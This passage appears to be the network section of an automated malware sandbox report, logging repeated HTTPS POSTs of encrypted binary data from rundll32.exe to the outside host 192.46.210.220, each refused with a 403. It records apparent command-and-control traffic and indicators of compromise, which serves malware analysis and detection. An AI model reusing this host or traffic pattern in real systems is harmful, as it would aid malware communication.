                                                                                                      2021-10-28 02:53:50 UTC93OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:51 UTC98INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.349750192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:17 UTC9OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:17 UTC9OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:18 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.349826192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:54 UTC98OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:54 UTC98OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:55 UTC108INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.349827192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:54 UTC103OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:54 UTC103OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:55 UTC108INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.349839192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:58 UTC108OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:58 UTC108OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:58 UTC118INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.349840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:58 UTC113OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:58 UTC113OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:58 UTC118INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.349847192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:02 UTC118OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:02 UTC118OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:02 UTC128INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.349848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:02 UTC123OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:02 UTC123OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:02 UTC128INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.349856192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:05 UTC128OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:05 UTC128OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:06 UTC138INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.349857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:06 UTC133OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:06 UTC133OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:06 UTC138INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.349864192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:09 UTC138OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:09 UTC138OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:10 UTC147INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.349865192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:09 UTC143OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:09 UTC143OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:10 UTC148INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.349751192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:18 UTC14OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:18 UTC14OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:18 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.349872192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:13 UTC148OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
